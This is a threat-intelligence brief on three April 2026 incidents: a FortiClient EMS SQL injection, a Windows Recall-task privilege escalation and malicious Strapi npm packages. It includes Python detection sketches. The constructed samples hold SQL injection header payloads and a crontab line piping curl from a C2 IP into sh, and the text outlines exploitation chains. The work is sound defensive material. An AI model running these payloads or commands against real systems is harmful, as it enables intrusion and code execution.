Cyber Threat Brief — April 14 2026
1. Fortinet FortiClient EMS Pre-Auth SQL Injection — CVE-2026-21643
TL;DR: CISA added CVE-2026-21643 (CVSS 9.3) to KEV on April 13 — a pre-auth SQLi in FortiClient EMS 7.4.4 multi-tenant deployments via the Site HTTP header on /api/v1/init_consts. Chainable with existing exploit tooling to full unauth RCE; ~1,000 instances exposed on Shodan.
What’s New:
- KEV addition April 13 2026; federal mitigation deadline May 4. Patch: upgrade 7.4.4 → 7.4.5 (or later).
- Root cause: 7.4.4 refactor replaced parameterized queries with raw string interpolation; tenant identifier passed directly into SQL before any auth check (Bishop Fox).
- Exploitation: unauth GET to `/api/v1/init_consts` with a malicious `Site:` header → DB error messages returned (blind + error-based), no lockout → rapid tenant DB extraction.
- Scope: only 7.4.4 multi-tenant mode; single-site deployments unaffected. PoC public (Bishop Fox write-up includes payload structure).
- Active in-the-wild exploitation reported since late March (Help Net, Bleeping, Arctic Wolf).
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| HTTP request to /api/v1/init_consts with non-standard Site header | URI/Header | T1190 | WAF, reverse proxy, EMS access logs | Alert on any unauth hit; endpoint is rarely touched legitimately |
| Site: header containing SQL metacharacters (', ", --, /*, UNION, SLEEP, 0x) | Payload signature | T1190 | WAF, NGFW, access logs | Block and alert |
| Burst of 500-class responses from /api/v1/init_consts to a single source | Error anomaly | T1190 | EMS app logs, access logs | Hunt; blind SQLi probing |
| FortiClient EMS service account performing unusual SELECT/UNION against non-tenant tables | DB behavior | T1213 | PostgreSQL/MSSQL query logs | Alert on schema discovery queries from web tier |
| Outbound connections from EMS server to non-update / non-Fortinet destinations | Network | T1071.001 | Firewall, Zeek conn.log | Alert; post-exploit beaconing |
| FortiClient EMS version == 7.4.4 with multitenancy=true | Asset attribute | T1190 | CMDB, vuln scanner, EMS config | Prioritize patch |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None specific | Need: web datamodel search for uri_path="/api/v1/init_consts" with Site header containing SQL tokens; spike detection on EMS 5xx rate |
| Elastic | Generic “SQL Injection Attempt” (web) | Gap: no EMS-specific rule pinning /api/v1/init_consts or Site header abuse |
| Sigma | web_cve_2024_*_forticlient_ems.yml (CVE-2024-48788 only) | Need: new rule keyed on cs-uri-stem=/api/v1/init_consts + suspicious Site header values |
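The two access-log rules above (Site header carrying SQL tokens on the init_consts endpoint, and a 5xx burst from one source), as an added example that is not Fortinet's, Bishop Fox's or any vendor's code. It runs over a constructed JSON-lines access log; the field names (src, path, status, headers) are an assumption and must be mapped to what the reverse proxy or WAF in front of EMS actually emits.

```python
"""Detection sketch for CVE-2026-21643 probing against FortiClient EMS.

Added example. Rules from the Actionable Intel table:
  1. any request to /api/v1/init_consts whose Site header carries SQL tokens
  2. a burst of 5xx responses for that path from one source (blind probing)
"""
import json
import re
from collections import Counter

TARGET_PATH = "/api/v1/init_consts"

# SQL metacharacters and keywords from the payload-signature row. Deliberately
# no bare OR/AND: tenant names such as "andover" would false-positive.
SQL_TOKEN_RE = re.compile(
    r"""['"]|--|/\*|\b(?:union|select|sleep|pg_sleep|waitfor|benchmark)\b|0x[0-9a-f]{2,}""",
    re.IGNORECASE,
)

# Constructed sample log: one legitimate tenant hit, an error-based probing
# run from a single external address, then an unrelated 500 on another path.
SAMPLE_LOG = """\
{"ts":"2026-04-13T09:00:01Z","src":"10.20.0.5","path":"/api/v1/init_consts","status":200,"headers":{"Site":"corp-tenant"}}
{"ts":"2026-04-13T09:01:10Z","src":"203.0.113.7","path":"/api/v1/init_consts","status":500,"headers":{"Site":"x' AND 1=1--"}}
{"ts":"2026-04-13T09:01:11Z","src":"203.0.113.7","path":"/api/v1/init_consts","status":500,"headers":{"Site":"x' UNION SELECT NULL,NULL--"}}
{"ts":"2026-04-13T09:01:12Z","src":"203.0.113.7","path":"/api/v1/init_consts","status":500,"headers":{"Site":"x';SELECT pg_sleep(5)--"}}
{"ts":"2026-04-13T09:01:13Z","src":"203.0.113.7","path":"/api/v1/init_consts","status":500,"headers":{"Site":"x'/**/OR/**/1=1--"}}
{"ts":"2026-04-13T09:01:14Z","src":"203.0.113.7","path":"/api/v1/init_consts","status":500,"headers":{"Site":"x' OR 0x41=0x41--"}}
{"ts":"2026-04-13T09:02:00Z","src":"10.20.0.9","path":"/api/v1/status","status":500,"headers":{}}
"""


def parse_log(text):
    """Parse JSON lines, skipping blank and unparsable rows."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def site_header(record):
    """Case-insensitive header lookup; proxies often lower-case header names."""
    for name, value in record.get("headers", {}).items():
        if name.lower() == "site":
            return value
    return None


def find_injection_attempts(records):
    """Rule 1: target path plus a Site header containing SQL tokens."""
    hits = []
    for rec in records:
        if rec.get("path") != TARGET_PATH:
            continue
        site = site_header(rec)
        if site is not None and SQL_TOKEN_RE.search(site):
            hits.append((rec.get("src"), site))
    return hits


def find_error_bursts(records, threshold=3):
    """Rule 2: at least `threshold` 5xx responses on the target path per source."""
    counts = Counter(
        rec.get("src")
        for rec in records
        if rec.get("path") == TARGET_PATH and 500 <= int(rec.get("status", 0)) < 600
    )
    return {src: n for src, n in counts.items() if n >= threshold}


def analyze(text):
    records = parse_log(text)
    return {
        "injection_attempts": find_injection_attempts(records),
        "error_bursts": find_error_bursts(records),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

Rule 2 deliberately ignores the Site header: a tuned blind/boolean payload may carry nothing the token list catches, but the error rate on an endpoint legitimate tenants hit once per session still stands out.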
Sources: CISA KEV Alert — Apr 13 · Bishop Fox writeup · Arctic Wolf · Help Net Security · SOC Prime
2. Windows Host Process for Tasks LPE — CVE-2025-60710
TL;DR: CISA added CVE-2025-60710 to KEV on April 13; public PoC on GitHub drives SYSTEM-level arbitrary folder delete via symlink abuse of the WindowsAI\Recall\PolicyConfiguration scheduled task on Windows 11 24H2/25H2 and Server 2025. Patched in MS October 2025 rollup.
What’s New:
- KEV addition April 13 2026 (federal mitigation due May 4); confirmed in-the-wild exploitation.
- PoC: github.com/redpack-kr/CVE-2025-60710; 4 total public PoCs tracked by PoC-in-GitHub.
- Mechanic: `taskhostw.exe` running as SYSTEM deletes `%LOCALAPPDATA%\CoreAIPlatform.00\UKP\*` without validating symlinks → TOCTOU/link-follow → arbitrary folder delete as SYSTEM → convert to EoP via standard delete-to-SYSTEM primitives (e.g., AVD/MSI rollback tricks).
- Trigger: `WnfStateChangeTrigger RecallPolicyCheckUpdateTrigger`; attacker can force task execution from a low-priv context; no reboot required.
- Affected: Win11 24H2/25H2 and Windows Server 2025 (including Server Core). Patched KB5066835 / Oct 14 2025 Patch Tuesday.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Junction/symlink creation under %LOCALAPPDATA%\CoreAIPlatform.00\UKP | Filesystem | T1068 | Sysmon EID 11 (FileCreate; covers file symlinks, directory junctions need EDR/ETW directory telemetry) | Alert; this directory should not normally contain reparse points |
| taskhostw.exe deleting outside %LOCALAPPDATA% (e.g., C:\Windows\System32\*, Program Files\*) | Process-File | T1068 | EDR file-delete events, Sysmon EID 23/26 | High-fidelity alert; indicates successful symlink traversal |
| Scheduled task start: \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration triggered from a non-admin user session | Task activity | T1053.005 | Task Scheduler Operational EID 100/200 (task/action started), Security 4698/4702 for task changes, 4624 for session correlation | Hunt; task start from the WNF trigger under a low-priv user |
| Registry/WNF state change: WNF_AI_RECALL_POLICY_CHECK_UPDATE from non-system process | WNF | T1068 | ETW Microsoft-Windows-Kernel-WNF | Hunt; rarely written outside system services |
| New SYSTEM-context process spawned shortly after taskhostw.exe file-delete burst | Correlation | T1068 | EDR, Sysmon EID 1, EID 23 | Alert; chained EoP |
| KB5066835 (or later) not installed on Win11 24H2/25H2 / Server 2025 | Patch state | T1068 | MECM, Tenable, Defender TVM | Prioritize patch (KEV) |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Suspicious Scheduled Task Runtime (generic) | Need: rule for taskhostw.exe file deletes outside per-user profile paths; junction creation under CoreAIPlatform.00 |
| Elastic | Privilege Escalation via Windows Scheduled Task (generic) | Gap: no Recall/CoreAIPlatform-specific logic; needs FileCreate rule on reparse points in that directory |
| Sigma | proc_creation_win_taskhostw_susp_* (partial, unrelated) | Need: new file_event_win_taskhostw_unusual_delete.yml and file_event_win_coreai_symlink.yml |
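The three host rules above (reparse point under the UKP folder, SYSTEM taskhostw.exe deleting outside a user profile, SYSTEM process spawn after a delete burst), as an added example that is not Microsoft's or any vendor's code. It runs over a constructed event list in a normalised schema (kind, ts, image, user, target, link) that is an assumption: map it from the Sysmon (EID 11/23/26/1) or EDR fields actually collected. The paths in the sample are hypothetical; the GUID-named subfolders the real task touches are not reproduced.

```python
"""Detection sketch for CVE-2025-60710 exploitation traces.

Added example. Rules from the Actionable Intel table:
  1. symlink/junction created under %LOCALAPPDATA%\\CoreAIPlatform.00\\UKP
  2. taskhostw.exe running as SYSTEM deleting outside <user>\\AppData\\Local
  3. a SYSTEM-context process starting shortly after such a delete burst
"""
import re

UKP_RE = re.compile(r"\\appdata\\local\\coreaiplatform\.00\\ukp(\\|$)", re.IGNORECASE)
USER_LOCAL_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\", re.IGNORECASE)
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
TASKHOSTW = "C:\\Windows\\System32\\taskhostw.exe"

# Constructed events: a low-priv user plants a junction, the SYSTEM task
# follows it and deletes vendor files, then an unexpected SYSTEM process starts.
EVENTS = [
    {"ts": 100, "kind": "file_create", "user": "CORP\\alice", "image": "C:\\Users\\alice\\poc.exe",
     "target": "C:\\Users\\alice\\AppData\\Local\\CoreAIPlatform.00\\UKP\\link", "link": "junction"},
    {"ts": 102, "kind": "file_delete", "user": SYSTEM_USER, "image": TASKHOSTW,
     "target": "C:\\Program Files\\Vendor\\app.dll"},
    {"ts": 103, "kind": "file_delete", "user": SYSTEM_USER, "image": TASKHOSTW,
     "target": "C:\\Users\\alice\\AppData\\Local\\CoreAIPlatform.00\\UKP\\cache.bin"},  # benign
    {"ts": 104, "kind": "file_delete", "user": SYSTEM_USER, "image": TASKHOSTW,
     "target": "C:\\Program Files\\Vendor\\config.json"},
    {"ts": 105, "kind": "file_delete", "user": SYSTEM_USER, "image": TASKHOSTW,
     "target": "C:\\Windows\\System32\\Tasks\\Vendor\\Updater"},
    {"ts": 130, "kind": "process_create", "user": SYSTEM_USER, "image": "C:\\Windows\\Temp\\x.exe"},
    {"ts": 500, "kind": "process_create", "user": SYSTEM_USER, "image": "C:\\Windows\\System32\\svchost.exe"},
]


def find_ukp_links(events):
    """Rule 1: any reparse point (junction/symlink) created under the UKP folder."""
    return [e["target"] for e in events
            if e["kind"] == "file_create" and e.get("link") and UKP_RE.search(e["target"])]


def find_taskhostw_out_of_profile_deletes(events):
    """Rule 2: SYSTEM taskhostw.exe deleting anything outside <user>\\AppData\\Local."""
    return [e for e in events
            if e["kind"] == "file_delete"
            and e["image"].lower().endswith("\\taskhostw.exe")
            and e["user"] == SYSTEM_USER
            and not USER_LOCAL_RE.match(e["target"])]


def find_system_spawn_after_burst(events, burst_min=2, window=60):
    """Rule 3: SYSTEM process starts within `window` seconds after a burst of
    at least `burst_min` rule-2 deletes. In production, allowlist expected
    SYSTEM spawns (service starts, maintenance tasks) against local baseline."""
    deletes = sorted(e["ts"] for e in find_taskhostw_out_of_profile_deletes(events))
    if len(deletes) < burst_min:
        return []
    start, end = deletes[0], deletes[-1] + window
    return [e["image"] for e in events
            if e["kind"] == "process_create" and e["user"] == SYSTEM_USER
            and start <= e["ts"] <= end]


def run_rules(events):
    return {
        "ukp_reparse_points": find_ukp_links(events),
        "taskhostw_deletes": [e["target"] for e in find_taskhostw_out_of_profile_deletes(events)],
        "system_spawn_after_burst": find_system_spawn_after_burst(events),
    }


if __name__ == "__main__":
    for key, value in run_rules(EVENTS).items():
        print(key, value)
```

Rule 2 is the high-fidelity one: the task's legitimate deletes all land inside the per-user UKP folder, so any other target means the link was followed. Rule 3 only narrows which SYSTEM process to look at once rule 2 has fired.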
Sources: CISA KEV Alert — Apr 13 · NVD — CVE-2025-60710 · Rapid7 DB · PoC — redpack-kr · SecurityOnline PoC writeup
3. Guardarian-Targeted Strapi npm Supply-Chain Attack
TL;DR: A coordinated campaign planted 36 malicious npm packages impersonating Strapi CMS plugins; postinstall scripts drop a persistent Node C2 agent, exploit local Redis/PostgreSQL, and surgically target the Guardarian crypto-exchange. Active since early April 2026; latest variants are fileless (node -e).
What’s New:
- 36 packages across 4 npm accounts (`umarbek1233`, `kekylf12`, `tikeqemif26`, `umar_bektembiev1`), all v3.6.8 with an identical 3-file layout; published late March → detected Apr 3 (Safedep).
- Sample names: `strapi-plugin-cron`, `strapi-plugin-events`, `strapi-plugin-config`, `strapi-plugin-server`, `strapi-plugin-database`, `strapi-plugin-core`, `strapi-plugin-hooks`, `strapi-plugin-monitor`, `strapi-plugin-seed`.
- Execution: `postinstall` hook → filesystem-wide secret search → writes `/tmp/.node_gc.js` (detached background) + installs crontab to respawn every minute.
- Capability: Redis RCE (via `CONFIG SET dir` / `SLAVEOF` classic), PostgreSQL credential theft, PHP webshell drop under uploads, Guardarian-specific hostname + credential targeting hardcoded.
- Variant evolution: v3.6.9 removed the disk artifact; the entire agent is passed inline as `node -e '<string>'`, so only network and process IOCs remain.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| 144.31.107.231 | C2 IP | T1071.001 | Firewall, Zeek conn.log, proxy | Block and retro-hunt 90 days |
| /tmp/.node_gc.js, /tmp/vps_shell.sh on any Linux/macOS dev or CI host | File artifact | T1059.007 / T1543 | osquery, EDR, auditd | Alert and remove; run IR |
| Crontab entries referencing node_gc, curl .*144\.31\.107\.231, or /tmp/.node_gc.js | Persistence | T1053.003 | auditd, osquery crontab table, EDR | High-fidelity alert |
| npm package installs where name matches `^strapi-plugin-(cron\|events\|config\|server\|database\|core\|hooks\|monitor\|seed)$` | Package name | T1195.002 | npm/CI install logs, lockfiles, internal registry mirror logs | Block in mirror/proxy and alert; a completed install already ran the postinstall, so run IR |
| npm publisher accounts: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1 | Attribution | T1195.002 | npm audit, internal registry mirror logs | Blocklist in internal mirror/proxy |
| Detached node -e processes with long inline scripts under non-interactive user | Process | T1059.007 | EDR, Sysmon-for-Linux EID 1, auditd execve | Alert; v3.6.9 fileless variant |
| Redis CONFIG SET dir / SLAVEOF from local or same-host client on dev/CI boxes | App behavior | T1210 | Redis command logs, Falco | Alert |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Linux Auditd Add User To Privileged Group (generic), npm install Suspicious Postinstall (community) | Need: package-name blocklist search, cron file modifications referencing /tmp/.node_gc.js, conn.log to 144.31.107.231 |
| Elastic | Suspicious Execution via Scheduled Task (Linux) (generic) | Gap: no rule for postinstall-spawned node processes with detached long inline scripts |
| Sigma | lnx_auditd_susp_cron.yml, lnx_auditd_node_e_suspicious.yml (partial) | Need: lnx_npm_postinstall_strapi_malware.yml keyed on package-name + cron + node_gc file path |
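The package-name, publisher, fileless-postinstall and crontab IOCs above, as an added example that is not Safedep's, npm's or any vendor's code. The inputs are constructed: a package-lock.json fragment, a registry version document, a package.json with a v3.6.9-style inline postinstall, and a crontab dump. Assumptions: lockfile v2/v3 layout (`packages` keyed by `node_modules/<name>`), the registry's `maintainers` / `_npmUser` fields for publisher attribution, and a 200-character threshold for "long inline script" (tune to local baseline). The inline body in the sample is filler, not the campaign's payload.

```python
"""IOC checks for the Strapi-impersonating npm campaign.

Added example. Four checks from the Actionable Intel table: package name on
the campaign list, campaign publisher account, `node -e` with a long inline
script in postinstall (fileless variant), and crontab persistence/C2 lines.
"""
import re

MALICIOUS_NAME_RE = re.compile(
    r"^strapi-plugin-(cron|events|config|server|database|core|hooks|monitor|seed)$"
)
MALICIOUS_PUBLISHERS = {"umarbek1233", "kekylf12", "tikeqemif26", "umar_bektembiev1"}
CRON_IOC_RE = re.compile(r"node_gc|144\.31\.107\.231|/tmp/\.node_gc\.js|/tmp/vps_shell\.sh")
# 200 chars is an assumed threshold for "long inline script".
INLINE_NODE_RE = re.compile(r"\bnode\s+(?:-e|--eval)\s+(['\"])(.{200,})\1", re.DOTALL)

# Constructed inputs.
LOCKFILE = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "my-strapi-app", "version": "1.0.0"},
        "node_modules/@strapi/strapi": {"version": "5.0.0"},
        "node_modules/strapi-plugin-cron": {"version": "3.6.8"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
}
VERSION_DOC = {
    "name": "strapi-plugin-cron", "version": "3.6.8",
    "_npmUser": {"name": "umarbek1233"},
    "maintainers": [{"name": "umarbek1233"}],
}
# Filler stands in for the inline agent; the real string is not reproduced.
FILELESS_PKG = {"name": "strapi-plugin-hooks", "version": "3.6.9",
                "scripts": {"postinstall": "node -e '" + "a=1;" * 60 + "'"}}
BENIGN_PKG = {"name": "my-plugin", "scripts": {"postinstall": "node scripts/build.js"}}
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /usr/bin/node /tmp/.node_gc.js >/dev/null 2>&1
*/5 * * * * curl -s http://144.31.107.231/u | sh
"""


def scan_lockfile(lock):
    """Return (name, version) for every installed package on the campaign list."""
    hits = []
    for key, meta in lock.get("packages", {}).items():
        name = key.rsplit("node_modules/", 1)[-1]  # handles nested and scoped keys
        if MALICIOUS_NAME_RE.match(name):
            hits.append((name, meta.get("version")))
    return hits


def scan_publisher(version_doc):
    """Return campaign accounts appearing as publisher (_npmUser) or maintainer."""
    names = {m.get("name") for m in version_doc.get("maintainers", [])}
    names.add(version_doc.get("_npmUser", {}).get("name"))
    return sorted(names & MALICIOUS_PUBLISHERS)


def has_inline_postinstall(package_json):
    """True when postinstall hands `node -e` a long inline script."""
    script = package_json.get("scripts", {}).get("postinstall", "")
    return INLINE_NODE_RE.search(script) is not None


def scan_crontab(text):
    """Return crontab lines referencing the campaign's persistence or C2 IOCs."""
    return [line for line in text.splitlines() if CRON_IOC_RE.search(line)]


if __name__ == "__main__":
    print("lockfile:", scan_lockfile(LOCKFILE))
    print("publisher:", scan_publisher(VERSION_DOC))
    print("fileless postinstall:", has_inline_postinstall(FILELESS_PKG))
    print("crontab:", scan_crontab(CRONTAB))
```

The lockfile check catches hosts that already installed a listed package; the publisher check is what an internal registry mirror should apply before the tarball is served, since the account list outlives any one package name. The postinstall regex is the only check that survives the v3.6.9 variant, and it is heuristic: pair it with the process-level `node -e` rule in the table.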
Sources: Safedep research · The Hacker News · SecurityWeek — Guardarian targeting · Cybersecurity News
Status Updates
- CVE-2026-34621 (Adobe Acrobat/Reader): Added to CISA KEV April 13; federal mitigation deadline May 4. No new IOCs beyond April 13 brief. Original coverage.
- CVE-2023-21529 (Microsoft Exchange): Added to KEV April 13 as part of Storm-1175’s n-day rotation (Microsoft blog, April 6). Apply Feb 2023 SU if any Exchange server remains unpatched. Storm-1175 coverage.
- CVE-2020-9715 / CVE-2012-1854 / CVE-2023-36424: Older flaws added to KEV April 13 (Adobe Acrobat UAF, MS VBA insecure library load, Windows OOB read). Confirm patched on all endpoints; no new detection content required.